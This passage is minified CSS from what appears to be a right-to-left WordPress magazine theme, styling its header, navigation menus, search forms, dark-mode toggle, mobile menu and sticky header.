align-items: stretch; flex-flow: row nowrap; } .navbar-left { flex-grow: 1; } .header-3 .navbar-wrap .navbar-left, .header-3 .navbar-wrap .navbar-right { flex-grow: 0; } .header-3 .navbar-wrap .navbar-center { flex-grow: 1; justify-content: center; } .logo-wrap { display: flex; display: -webkit-flex; align-items: center; flex-shrink: 0; max-height: 100%; margin-left: 20px; } .the-logo a { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .the-logo img { max-width: 100%; } .logo-wrap a { max-height: 100%; } .is-image-logo.logo-wrap a { display: block; } .logo-wrap img { display: block; width: auto; max-height: var(--nav-height); -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); object-fit: cover; } .is-hd-4, .is-hd-5 { --nav-height: 40px; } .header-4 .logo-wrap:not(.mobile-logo-wrap) img { max-height: var(--hd4-logo-height, 60px); } .header-5 .logo-wrap:not(.mobile-logo-wrap) img { max-height: var(--hd5-logo-height, 60px); } .header-4 .main-menu > li > a, .header-4 .more-section-outer .more-trigger { padding-right: var(--menu-item-spacing, 20px); padding-left: var(--menu-item-spacing, 20px); border-right: 1px solid var(--flex-gray-15); } .header-4.header-fw .main-menu > li:first-child > a { border-right: none; } .header-5 .logo-sec-left, .header-5 .logo-sec-center, .header-5 .logo-sec-right { position: relative; display: flex; flex: 0 0 33.33%; margin: 0; } .header-5 .logo-sec-left { line-height: 1; align-items: center; } .logo-sec-left > *:not(:last-child):before { position: absolute; top: .4em; bottom: .4em; left: 0; display: block; content: ''; border-left: 1px solid var(--nav-color-10); } .header-5 .logo-sec-center { justify-content: center; } .header-5 .logo-wrap:not(.mobile-logo-wrap) { margin: 0; } .header-5 .logo-sec-right { align-items: stretch; justify-content: flex-end; } .header-5 .navbar-center { justify-content: center; width: 100%; } .more-section-outer .more-trigger, .logo-sec { padding-top: 15px; padding-bottom: 15px; } .logo-sec-inner { display: flex; align-items: center; flex-flow: row nowrap; } .logo-sec-center { margin: 0 auto; } .logo-sec-right { display: flex; align-items: center; flex-flow: row nowrap; margin-right: auto; } .logo-sec-right > * { padding-right: 10px; padding-left: 10px; } .logo-sec-right .header-search-form { margin-bottom: 0; } .logo-sec-right .search-form-inner { min-width: 320px; background-color: var(--flex-gray-7); } .header-social-list > a { padding-right: 5px; padding-left: 5px; } .is-logo-svg img { width: auto; height: 999px; object-fit: contain; } .the-logo a:hover, .logo-wrap a:hover img { opacity: .7; } .logo-wrap.is-text-logo { align-items: center; } .is-text-logo .logo-title > * { position: relative; display: inline-block; letter-spacing: -.05em; text-transform: uppercase; color: var(--nav-color); } .is-text-logo .logo-title > *:first-letter { color: var(--g-color); } .navbar-right > * { position: static; display: flex; display: -webkit-flex; align-items: center; height: 100%; } .navbar-outer .navbar-right > * { color: var(--nav-color); } .large-menu > li { position: relative; display: block; float: right; } .large-menu .sub-menu li, .menu-has-child-flex { position: relative; } .large-menu .sub-menu, .header-dropdown { position: absolute; z-index: 9999; top: -9999px; right: 0; left: auto; display: block; visibility: hidden; min-width: 210px; margin-top: 20px; -webkit-transition: top 0s, opacity .25s var(--timing), margin .25s var(--timing); transition: top 0s, opacity .25s var(--timing), margin .25s var(--timing); pointer-events: none; opacity: 0; border-radius: var(--round-7); } .mega-dropdown, .flex-dropdown { position: absolute; z-index: 888; top: -9999px; right: auto; left: -10%; display: block; overflow: hidden; min-width: 180px; margin-top: 20px; cursor: auto; -webkit-transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; transition: top 0s ease .25s, opacity .25s var(--timing), margin .25s var(--timing) .25s; pointer-events: none; opacity: 0; background: transparent; } .mega-dropdown-inner:not(.mega-template-inner) { border-radius: var(--round-7); background: var(--subnav-bg); background: -webkit-linear-gradient(right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .mega-dropdown { width: 100vw; } .more-section-inner { width: var(--more-width, auto); max-width: 100vw; pointer-events: auto; color: var(--subnav-color); border-radius: var(--round-7); background: var(--subnav-bg); background: -webkit-linear-gradient(right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .more-section .heading-title > * { color: var(--subnav-color); } .large-menu > li:hover > .sub-menu, .large-menu > li:hover > .header-dropdown, .header-dropdown-outer.dropdown-activated .header-dropdown { top: calc(100% - 1px); bottom: auto; visibility: visible; max-width: 1240px; margin-top: 0; pointer-events: auto; opacity: 1; } li.menu-item.mega-menu-loaded:hover > .mega-dropdown, li.menu-item.mega-menu-loaded:hover > .flex-dropdown, .menu-has-child-flex.dropdown-activated .flex-dropdown { top: calc(100% - 1px); bottom: auto; visibility: visible; margin-top: 0; -webkit-transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; transition: top 0s ease 0s, opacity .25s var(--timing), margin .25s var(--timing) 0s; opacity: 1; } .large-menu .sub-menu .sub-menu { top: -10px; right: 100%; margin-top: 0; margin-right: 20px; } .large-menu .sub-menu li:hover > .sub-menu { right: calc(100% - 5px); visibility: visible; margin-right: 0; pointer-events: auto; opacity: 1; } .sub-menu-title { font-size: var(--em-mini); line-height: 1; position: absolute; top: -3px; right: 100%; margin-right: 5px; padding: 2px 5px; color: var(--subnav-color); border-radius: var(--round-3); background: #eee; } .menu-has-child-mega .mega-dropdown-inner .sub-menu { display: none; } .mega-header { display: flex; align-items: center; flex-flow: row nowrap; width: 100%; margin-bottom: 20px; } .mega-header:not(.mega-header-fw) { padding-bottom: 5px; border-bottom: 1px solid var(--subnav-color-10); } .mega-link { display: inline-flex; align-items: center; margin-right: auto; -webkit-transition: var(--effect); transition: var(--effect); } .mega-link i { margin-right: 3px; -webkit-transition: var(--effect); transition: var(--effect); } .mega-link:hover { color: var(--g-color); } .mega-link:hover i { -webkit-transform: translateX(-3px); transform: translateX(-3px); } .is-mega-category .block-grid-small-1 .p-wrap { margin-bottom: 0; } .mega-dropdown-inner { width: 100%; padding: 20px 20px 30px 20px; pointer-events: auto; } .mega-template-inner { pointer-events: auto; } .flex-dropdown .mega-template-inner { border-radius: var(--round-5); -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .mega-hierarchical .mega-dropdown-inner { display: grid; padding: 20px 0 30px 0; grid-template-columns: 4fr 4fr 3fr; } .mega-hierarchical .p-list-small-1 { --bottom-spacing: 10px; } .mega-col { padding-right: 25px; padding-left: 25px; } .mega-col-intro { display: flex; flex-flow: column nowrap; justify-content: space-between; } .mega-col-intro > *:not(:last-child) { margin-bottom: 20px; } .mega-col-intro .category-hero-wrap { max-width: 90%; } .mega-header:not(.mega-header-fw) i { width: 1em; margin-left: 5px; color: var(--g-color); } .mega-hierarchical .p-list-small-2 .feat-holder { width: 125px; } .mega-col .p-wrap:last-child { margin-bottom: 0; } .block-follow.rb-columns > .block-inner { align-items: stretch; } .cbox-description { font-size: var(--rem-mini); } .cbox-description * { font-size: inherit; } .main-menu-wrap { display: flex; align-items: center; height: 100%; } .menu-item a > span { font-size: inherit; font-weight: inherit; font-style: inherit; position: relative; letter-spacing: inherit; } .main-menu > li > a { position: relative; display: flex; display: -webkit-flex; align-items: center; flex-wrap: nowrap; height: var(--nav-height); padding-right: var(--menu-item-spacing, 12px); padding-left: var(--menu-item-spacing, 12px); white-space: nowrap; color: var(--nav-color); } .main-menu > li > a .menu-sub-title { position: relative; right: auto; vertical-align: top; } .main-menu .sub-menu { padding: 10px 0; background: var(--subnav-bg); background: -webkit-linear-gradient(right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .menu-ani-1 .main-menu .sub-menu > .menu-item a { -webkit-transition: background .25s var(--timing), border-color .25s var(--timing); transition: background .25s var(--timing), border-color .25s var(--timing); border-right: 3px solid transparent; } .menu-ani-1 .main-menu .sub-menu > .menu-item a:hover { border-color: var(--subnav-color-h, var(--g-color)); background-color: var(--flex-gray-7); } .sub-menu > .menu-item a, .user-dropdown a { display: flex; align-items: center; width: 100%; padding: 7px 20px; } .sub-menu > .menu-item a span, .user-dropdown a, .more-section a, .elementor-widget-container .menu a { -webkit-transition: var(--effect); transition: var(--effect); } .more-section a:hover, .sub-menu > .menu-item a:hover > span, .user-dropdown a:hover, .elementor-widget-container .menu a:hover { color: var(--subnav-color-h, var(--g-color)); } .large-menu > .menu-item.menu-item-has-children > a > span { padding-left: 2px; } .large-menu > .menu-item.menu-item-has-children > a:after, .logged-welcome:after { font-family: 'ruby-icon'; font-size: var(--rem-mini); line-height: 1; content: '\e924'; -webkit-transition: -webkit-transform .25s var(--timing), color .25s var(--timing); transition: transform .25s var(--timing), color .25s var(--timing); will-change: transform; } .large-menu > .menu-item.menu-item-has-children:hover > a:after, .header-dropdown-outer.dropdown-activated .logged-welcome:after { -webkit-transform: rotate(180deg); transform: rotate(180deg); } .large-menu .sub-menu .menu-item.menu-item-has-children > a:after { font-family: 'ruby-icon'; font-size: var(--meta-fsize); line-height: 1; margin-right: auto; margin-left: 0; content: '\e926'; } body.rtl .large-menu .sub-menu .menu-item.menu-item-has-children > a:after { display: inline-block; -webkit-transform: scale(-1, 1); transform: scale(-1, 1); -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; } span.menu-sub-title { line-height: 1; position: absolute; top: 0; right: 100%; margin-right: 7px; padding: 2px 5px; white-space: nowrap; color: var(--subnav-color); border-radius: var(--round-3); background-color: var(--flex-gray-15); } .rb-menu > li > a .menu-sub-title { color: var(--nav-color); } .widget_nav_menu .menu-sub-title, .sidebar-menu .menu-sub-title { margin-top: -5px; margin-right: 5px; } .wnav-holder { padding-right: 5px; padding-left: 5px; } .wnav-holder svg { width: 20px; height: 20px; } .wnav-svg { line-height: 0; width: 20px; } [data-theme='dark'] .wnav-svg, [data-theme='dark'] .search-icon-svg img, .light-scheme .search-icon-svg img, body:not(.sticky-on) .header-transparent .navbar-right .wnav-svg { filter: invert(1); } .wnav-icon { font-size: 20px; } .widget-h-login.header-dropdown-outer { position: relative; } .widget-h-login .user-dropdown { right: auto; left: auto; } .logged-user-menu { padding-top: 10px; padding-bottom: 10px; } .widget-h-login .logout-url { color: var(--absolute-white) !important; background-color: var(--dark-accent); } .widget-h-login .logout-url:hover { background-color: var(--g-color); } .widget-h-login .logout-url svg { width: 14px; height: 14px; margin-right: auto; margin-left: 0; } body.rtl .widget-h-login .logout-url svg { display: inline-block; -webkit-transform: scale(-1, 1); transform: scale(-1, 1); -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; } .widget-p-listing .p-wrap { margin-bottom: 20px; } .widget-p-listing .p-wrap:last-child { margin-bottom: 0; } .sidebar-wrap .ad-wrap { padding-right: 0; padding-left: 0; } .w-header-search .header-search-form { width: 340px; max-width: 100%; margin-bottom: 0; padding: 5px; } .w-header-search .header-popup { right: auto; left: 0; } .w-header-search .search-form-inner { border: none; } .rb-search-form { position: relative; width: 100%; } .rb-search-submit { position: relative; display: flex; } .rb-search-submit input[type='submit'] { padding: 0; opacity: 0; } .rb-search-submit i { font-size: var(--em-small); line-height: 1; position: absolute; top: 0; right: 0; bottom: 0; display: flex; align-items: center; justify-content: center; width: 100%; -webkit-transition: var(--effect); transition: var(--effect); pointer-events: none; } .rb-search-form .search-icon { display: flex; flex-shrink: 0; justify-content: center; width: 40px; } .search-icon.search-icon-svg img, .search-icon svg { width: 20px; } .rb-search-submit:hover i { color: var(--g-color) } .search-form-inner { display: flex; align-items: center; border: 1px solid var(--flex-gray-15); border-radius: var(--round-5); } .header-wrap .search-form-inner { border-color: var(--subnav-color-10); } .mobile-collapse .search-form-inner { border-color: var(--submbnav-color-10, var(--flex-gray-15)); } .rb-search-form .search-text { flex-grow: 1; } .rb-search-form input { width: 100%; padding-right: 0; padding-left: 0; border: none; background: none; } .rb-search-form input::placeholder { opacity: .8; color: inherit; } img.svg { width: 100%; height: 100%; object-fit: contain; } .navbar-right { position: relative; flex-shrink: 0; } .header-dropdown-outer { position: static; } .dropdown-trigger { cursor: pointer; } .header-dropdown { right: auto; left: 0; overflow: hidden; min-width: 200px; background: var(--subnav-bg); background: -webkit-linear-gradient(right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-12); box-shadow: 0 4px 30px var(--shadow-12); } .menu-ani-1 .rb-menu > .menu-item > a > span:before { position: absolute; right: 0; bottom: 0; width: 0; height: 3px; content: ''; -webkit-transition: width 0s var(--timing), background-color .25s var(--timing); transition: width 0s var(--timing), background-color .25s var(--timing); background-color: transparent; } .menu-ani-1 .rb-menu > .menu-item > a > span:after { position: absolute; bottom: 0; left: 0; width: 0; height: 3px; content: ''; -webkit-transition: width .25s var(--timing); transition: width .25s var(--timing); background-color: var(--nav-color-h-accent, var(--g-color)); } .menu-ani-1 .rb-menu > .menu-item.current-menu-item > a > span:before { width: 100%; background-color: var(--nav-color-h-accent, var(--g-color)); } .menu-ani-1 .rb-menu > .menu-item > a:hover > span, .menu-ani-1 .rb-menu > .menu-item > a:hover:after { color: var(--nav-color-h, inherit); } .menu-ani-2 .rb-menu > .menu-item > a > span { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .menu-ani-2 .rb-menu > .menu-item > a:hover > span { opacity: .7; } .menu-ani-1 .rb-menu > .menu-item > a:hover > span:before { width: 100%; -webkit-transition: width .25s var(--timing); transition: width .25s var(--timing); background-color: var(--nav-color-h-accent, var(--g-color)); } .menu-ani-1 .rb-menu > .menu-item > a:hover > span:after, .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover > span:after { width: 100%; -webkit-transition: width 0s var(--timing); transition: width 0s var(--timing); background-color: transparent; } .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover > span, .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover:after { color: var(--transparent-nav-color-hover, inherit); } .menu-ani-1 .header-transparent .rb-menu > .menu-item > a > span:after, .menu-ani-1 .header-transparent .rb-menu > .menu-item.current-menu-item > a > span:before, .menu-ani-1 .header-transparent .rb-menu > .menu-item > a:hover > span:before { background-color: var(--transparent-nav-color-h-accent, var(--nav-color-h-accent, var(--g-color))); } .menu-item-icon { display: inline-flex; margin-left: 4px; } .menu-item-icon .icon-svg { flex-shrink: 0; width: 1em; } .burger-icon { position: relative; display: block; width: 24px; height: 16px; color: var(--nav-color, inherit); } .burger-icon > span { position: absolute; right: 0; display: block; height: 2px; -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); border-radius: 2px; background-color: currentColor; } .collapse-activated .burger-icon > span { -webkit-transition: var(--effect); transition: var(--effect); } .burger-icon > span:nth-child(1) { top: 0; width: 100%; } .burger-icon > span:nth-child(2) { top: 50%; width: 65%; margin-top: -1px; } .burger-icon > span:nth-child(3) { top: auto; bottom: 0; width: 40%; } .collapse-activated .burger-icon > span:nth-child(2) { background-color: transparent; } .collapse-activated .burger-icon > span:nth-child(1) { top: 50%; width: 100%; margin-top: -1px; -webkit-transform: rotate(-45deg); transform: rotate(-45deg); transform-origin: center center; } .collapse-activated .burger-icon > span:nth-child(3) { top: 50%; width: 100%; margin-top: -1px; -webkit-transform: rotate(45deg); transform: rotate(45deg); transform-origin: center center; } .login-toggle { display: inline-flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; } .login-toggle.is-btn { line-height: 30px; margin-left: 10px; padding: 0 20px; } .login-toggle span { font-size: var(--rem-mini); } .logged-welcome { font-size: var(--rem-mini); display: none; align-items: center; margin-right: 5px; } .logged-welcome:after { line-height: 1; display: inline-flex; } .logged-welcome strong { font-style: normal; margin-right: 2px; margin-left: 2px; } .logged-avatar img { width: 1.75em; border-radius: 100%; } .notification-icon { display: flex; } .notification-icon-inner { display: flex; align-items: center; } .notification-icon-inner .rbi-notification { position: relative; } .notification-info { position: absolute; top: -3px; left: -3px; width: 14px; height: 14px; text-align: center; opacity: 0; color: var(--absolute-white); border-radius: 100%; background-color: var(--g-color); } @-webkit-keyframes heartbeat { 0% { transform: scale(1); } 50% { transform: scale(.75); } 100% { transform: scale(1); } } @keyframes heartbeat { 0% { transform: scale(1); } 50% { transform: scale(.75); } 100% { transform: scale(1); } } .notification-activated .notification-info { -webkit-animation: heartbeat 1s infinite; animation: heartbeat 1s infinite; opacity: 1; } .notification-popup { display: block; width: 360px; max-width: 100%; } .notification-header { display: flex; align-items: center; padding: 10px 15px; background-color: var(--flex-gray-7); } .notification-latest { margin-bottom: 35px; } .notification-url { display: flex; align-items: center; flex-flow: row nowrap; margin-right: auto; -webkit-transition: var(--effect); transition: var(--effect); opacity: .7; } .notification-url:hover { opacity: 1; } .notification-url i { margin-right: 4px; } .notification-content .scroll-holder { overflow-y: scroll; max-height: 50vh; } .notification-content .p-wrap { margin-bottom: 0; padding: 10px 15px; } .notification-content-title { display: flex; align-items: center; flex-flow: nowrap; margin: 10px 15px; padding-bottom: 5px; border-bottom: 1px solid var(--flex-gray-15); } .notification-content-title i { margin-left: 4px; color: var(--g-color); } .notification-content .loadmore-trigger span { font-size: var(--rem-mini); line-height: 2em; margin-top: 15px; padding: 0 30px; } .menu-has-child-mega-columns { position: relative; display: flex; align-items: center; cursor: pointer; } .more-trigger { line-height: 0; height: 100%; -webkit-transition: var(--effect); transition: var(--effect); color: var(--nav-color); } .more-section-outer .svg-icon { width: 1em; } .more-section-outer .more-trigger { padding-right: var(--menu-item-spacing, 12px); padding-left: var(--menu-item-spacing, 12px); } .more-section-outer .more-trigger:hover, .more-section-outer.dropdown-activated .more-trigger { color: var(--g-color); } .dots-icon { display: flex; align-items: center; flex-flow: column nowrap; justify-content: space-between; height: 18px; -webkit-transition: var(--effect); transition: var(--effect); } .more-trigger:hover .dots-icon, .dropdown-activated .dots-icon { height: 22px; } .dots-icon > span { display: block; width: 4px; height: 4px; border-radius: 200%; background-color: currentColor; } .more-content { padding: 30px 20px 10px 20px; } .collapse-footer { padding: 15px; background-color: var(--subnav-color-10); } .mega-columns { display: grid; margin-right: -20px; margin-left: -20px; grid-template-columns: 1fr 1fr; } .mega-columns > * { padding-right: 20px; padding-left: 20px; } .menu-has-child-mega-columns.layout-col-1 .mega-columns { grid-template-columns: 1fr; } .menu-has-child-mega-columns.layout-col-3 .mega-columns { grid-template-columns: 1fr 1fr 1fr; } .menu-has-child-mega-columns.layout-col-4 .mega-columns { grid-template-columns: 1fr 1fr 1fr 1fr; } .menu-has-child-mega-columns.layout-col-5 .mega-columns { grid-template-columns: 1fr 1fr 1fr 1fr 1fr; } .more-section .header-search-form { min-width: 320px; margin-bottom: 25px; } .more-col { min-width: 170px; margin-bottom: 20px; padding-right: 20px; padding-left: 20px; } .more-col .widget-heading, .elementor-widget-wp-widget-nav_menu h5 { font-size: var(--h4-fsize); display: block; margin-bottom: 7px; } .header-search-form { margin-bottom: 20px; } .header-search-form .h5 { display: block; margin-bottom: 10px; } .live-search-form-outer { position: relative; } .live-search-absolute { position: absolute; z-index: 1000; top: 100%; right: 0; left: 0; color: var(--body-color); border-radius: var(--round-5); background-color: var(--solid-white); } .more-content .live-search-absolute { color: var(--subnav-color); background: var(--subnav-bg); background: -webkit-linear-gradient(right, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); background: linear-gradient(to left, var(--subnav-bg-from) 0%, var(--subnav-bg-to) 100%); } .live-search-animation.rb-loader { position: absolute; top: 15px; left: 10px; width: 20px; height: 20px; opacity: 0; color: inherit; } .live-search-link .is-btn { padding: 7px 25px; } .live-search-link .is-btn:hover { color: var(--absolute-white); } .live-search-response-inner { position: relative; margin: 0 15px 15px 15px; padding-top: 20px; } .live-search-response-inner:before { position: absolute; top: 5px; right: 0; left: 0; display: block; width: 100%; content: ''; border-top: 2px solid var(--flex-gray-15); } .live-search-absolute .live-search-response-inner:before { border-top: none; } .live-search-no-result { font-size: var(--rem-mini); opacity: .5; } .live-search-response .p-list-small-2 .feat-holder { width: 80px; } .live-search-link { text-align: center; } .search-loading .live-search-animation.rb-loader { display: block; opacity: 1; } .search-loading .rb-search-submit i { display: none; } .collapse-footer > * { margin-bottom: 12px; } .collapse-footer > *:last-child { margin-bottom: 0; } .collapse-footer-menu-inner { display: flex; flex-flow: row wrap; } .collapse-footer-menu-inner li { position: relative; display: flex; align-items: center; flex-flow: row nowrap; } .collapse-footer-menu-inner li:not(:last-child):after { display: flex; width: 3px; height: 3px; margin-right: 10px; margin-left: 10px; content: ''; opacity: .25; border-radius: 100%; background-color: currentColor; } .collapse-copyright { font-size: var(--rem-mini); opacity: .7; } .sub-menu.left-direction, .header-dropdown.left-direction { right: auto; left: -10%; } .sub-menu .sub-menu.left-direction { left: 100%; margin-left: 20px; } .large-menu .sub-menu li:hover > .sub-menu.left-direction { right: auto; left: calc(100% - 1px); margin-left: 0; } .dark-mode-toggle-wrap { height: auto; } .dark-mode-toggle { display: flex; align-items: center; cursor: pointer; } .dark-mode-toggle-wrap:not(:first-child) .dark-mode-toggle { position: relative; margin-right: 5px; padding-right: 10px; border-right: 1px solid var(--flex-gray-40); } .navbar-outer .dark-mode-toggle-wrap:not(:first-child) .dark-mode-toggle { border-color: var(--nav-color-10); } .dark-mode-slide { position: relative; width: 40px; height: 14px; border-radius: 20px; background-color: var(--flex-gray-15); } .dark-mode-slide-btn { position: absolute; top: -5px; right: 0; display: flex; visibility: hidden; align-items: center; justify-content: center; width: 24px; height: 24px; -webkit-transition: opacity .1s; transition: opacity .1s; opacity: 0; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--solid-white); -webkit-box-shadow: 0 1px 4px var(--shadow-12) !important; box-shadow: 0 1px 4px var(--shadow-12) !important; } .triggered .dark-mode-slide-btn { -webkit-transition: opacity .25s, transform .5s; transition: opacity .25s, transform .5s; will-change: transform; } .svg-mode-light { color: var(--body-fcolor); } .mode-icon-dark { color: #fff; background-color: var(--g-color); } .dark-mode-slide-btn svg { width: 14px; height: 14px; } .dark-mode-slide-btn.activated { visibility: visible; opacity: 1; } .mode-icon-dark:not(.activated), .mode-icon-default.activated { -webkit-transform: translateX(0px); transform: translateX(0px); } .mode-icon-default:not(.activated), .mode-icon-dark.activated { -webkit-transform: translateX(-16px); transform: translateX(-16px); } body.switch-smooth { -webkit-transition: background-color .25s var(--timing); transition: background-color .25s var(--timing); } .navbar-outer { position: relative; z-index: 110; display: block; width: 100%; } .elementor-editor-active .header-transparent { pointer-events: none; } .elementor-editor-active .navbar-outer { z-index: 0; } .is-mstick .navbar-outer { min-height: var(--nav-height); } .is-mstick .sticky-holder { position: absolute; z-index: 998; top: 0; right: 0; width: 100%; } .sticky-on .mobile-qview { display: none; } @-webkit-keyframes stick-animation { from { top: -100px; } to { top: 0; } } @keyframes stick-animation { from { top: -100px; } to { top: 0; } } @-webkit-keyframes unstick-animation { from { opacity: 1; } to { opacity: 0; } } @keyframes unstick-animation { from { opacity: 1; } to { opacity: 0; } } .sticky-on.is-mstick .sticky-holder, .sticky-on .e-section-sticky { position: fixed; top: 0; right: 0; left: 0; -webkit-animation-name: stick-animation; animation-name: stick-animation; -webkit-animation-duration: 300ms; animation-duration: 300ms; -webkit-animation-timing-function: ease-out; animation-timing-function: ease-out; -webkit-animation-iteration-count: 1; animation-iteration-count: 1; } .sticky-on.is-mstick.unstick-animated .sticky-holder, .sticky-on.unstick-animated .e-section-sticky { -webkit-animation-name: unstick-animation; animation-name: unstick-animation; -webkit-animation-duration: 150ms; animation-duration: 150ms; opacity: 0; } .e-section-sticky { z-index: 1000; } .collapse-activated, .collapse-activated body, .collapse-activated .sticky-holder, .collapse-activated .header-mobile { overflow: hidden; height: 100%; } .collapse-activated .site-outer { overflow: hidden; height: 100%; margin-top: 0 !important; -webkit-transition: none; transition: none; } .collapse-activated .header-wrap { display: flex; align-items: stretch; flex-flow: column nowrap; height: 100%; min-height: 100vh; } .collapse-activated .navbar-outer { flex-grow: 1; } .header-mobile-wrap { position: relative; z-index: 99; flex-grow: 0; flex-shrink: 0; color: var(--mbnav-color, var(--nav-color)); background: var(--mbnav-bg, var(--nav-bg)); background: -webkit-linear-gradient(right, var(--mbnav-bg-from, var(--nav-bg-from)) 0%, var(--mbnav-bg-to, var(--nav-bg-to)) 100%); background: linear-gradient(to left, var(--mbnav-bg-from, var(--nav-bg-from)) 0%, var(--mbnav-bg-to, var(--nav-bg-to)) 100%); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .header-mobile-wrap .is-text-logo .logo-title > *, .header-mobile-wrap .navbar-right > * { color: inherit; } .mobile-logo-wrap { display: flex; flex-grow: 0; } .mobile-logo-wrap img { width: auto; max-height: var(--mbnav-height, 42px); } #amp-header .navbar-left .mobile-logo-wrap img { object-position: right !important; } .header-mobile .logo-title a { line-height: var(--mbnav-height, 42px); } .mobile-collapse-holder { display: block; overflow-y: auto; width: 100%; } .mobile-collapse .header-search-form { margin-bottom: 15px; } .mobile-collapse .rb-search-form input { padding-right: 0; } .mbnav { display: flex; align-items: center; flex-flow: row nowrap; min-height: var(--mbnav-height, 42px); } .header-mobile-wrap .navbar-right { align-items: center; justify-content: flex-end; } .mbnav-center .navbar-left, .mbnav-center .navbar-right { flex-grow: 0; flex-shrink: 0; width: 30%; } .mbnav-center .navbar-center { display: flex; justify-content: center; width: 40%; } .mbnav-center .wnav-holder { padding-right: 3px; padding-left: 3px; } .mobile-toggle-wrap { display: flex; align-items: stretch; } .navbar-right .mobile-toggle-wrap { height: auto; } .navbar-right .mobile-toggle-wrap .burger-icon > span { right: auto; left: 0; } .navbar-right .mobile-toggle-wrap .mobile-menu-trigger { padding-right: 10px; padding-left: 0; } .mobile-menu-trigger { display: flex; align-items: center; padding-left: 10px; cursor: pointer; } .mobile-menu-trigger.mobile-search-icon { font-size: 18px; padding: 0 5px; } .mobile-menu-trigger i:before { -webkit-transition: var(--effect); transition: var(--effect); } .mobile-collapse { z-index: 0; display: flex; visibility: hidden; overflow: hidden; flex-grow: 1; height: 0; -webkit-transition: opacity .7s var(--timing); transition: opacity .7s var(--timing); opacity: 0; color: var(--submbnav-color, var(--subnav-color)); background: var(--submbnav-bg, var(--subnav-bg)); background: -webkit-linear-gradient(right, var(--submbnav-bg-from, var(--subnav-bg-from)) 0%, var(--submbnav-bg-to, var(--subnav-bg-to)) 100%); background: linear-gradient(to left, var(--submbnav-bg-from, var(--subnav-bg-from)) 0%, var(--submbnav-bg-to, var(--subnav-bg-to)) 100%); } .collapse-activated .mobile-collapse { visibility: visible; flex-grow: 1; height: auto; opacity: 1; } .mobile-collapse-sections { position: relative; max-width: 100%; margin-top: 20px; padding-top: 20px; } .mobile-collapse-inner { position: relative; display: block; width: 100%; padding-top: 15px; } .mobile-search-form .live-search-animation.rb-loader { top: 8px; } .mobile-menu > li.menu-item-has-children:not(:first-child) { margin-top: 20px; } .mobile-menu > li > a { display: block; padding: 10px 0; } .mobile-menu .sub-menu { display: flex; flex-flow: row wrap; padding-top: 5px; border-top: 1px solid var(--submbnav-color-10, var(--subnav-color-10)); } .mobile-menu .sub-menu > * { flex: 0 0 50%; } .mobile-menu .sub-menu a { display: block; width: 100%; padding: 7px 0; } .mobile-qview { position: relative; display: block; overflow: auto; width: 100%; border-top: 1px solid var(--nav-color-10); scrollbar-width: none; -ms-overflow-style: none; } .mobile-qview::-webkit-scrollbar { width: 0; height: 0; } .mobile-qview-inner { display: flex; flex-flow: row nowrap; } .mobile-qview a { line-height: 42px; position: relative; display: block; padding: 0 15px; white-space: nowrap; color: inherit; } .mobile-qview .menu-sub-title { display: none; } .mobile-qview a:before { position: absolute; right: 15px; bottom: 0; left: 15px; height: 4px; content: ''; -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--round-3); background-color: transparent; } .mobile-qview a:hover:before, .mobile-qview .current-menu-item > a:before { background-color: var(--g-color); } .mobile-qview a > span { font-size: var(--em-small); } .mobile-collapse-sections > * { display: flex; flex-flow: row nowrap; margin-bottom: 20px; padding-bottom: 20px; border-bottom: 1px solid var(--flex-gray-15); } .mobile-collapse-sections > .mobile-social-list { align-items: center; flex-flow: row wrap; } .mobile-collapse-sections > *:last-child { margin-bottom: 0; border-bottom: none; } .mobile-login-title, .mobile-social-list-title { flex-grow: 1; } .mobile-social-list a { font-size: 16px; flex-shrink: 0; padding: 0 12px; } .header-alert { font-size: var(--em-mini); display: flex; align-items: center; justify-content: center; padding-top: 5px; padding-bottom: 5px; text-align: center; color: var(--alert-color, inherit); background-color: var(--alert-bg, #ffc96a); } .header-ad-widget { padding: 15px 20px; } .sticky-on .header-alert.is-sticky-hide { visibility: hidden; } .top-site-ad { position: fixed; top: 0; right: 0; bottom: auto; display: block; width: 100%; height: auto; text-align: center; background-color: var(--top-site-bg, var(--flex-gray-7)); } .top-site-ad:not(.no-spacing) { padding-top: 15px; padding-bottom: 15px; } .top-site-ad.no-spacing .edge-padding { padding-right: 0; padding-left: 0; } .top-site-ad .ad-image { border-radius: 0; } .yes-hd-transparent .top-site-ad { background-color: var(--top-site-bg, #141519); } .admin-bar .top-site-ad { top: 32px; } /* ----------------- 6 - Post Entry ----------------- */ .p-wrap { position: relative; margin-bottom: var(--bottom-spacing); } .p-overlay { 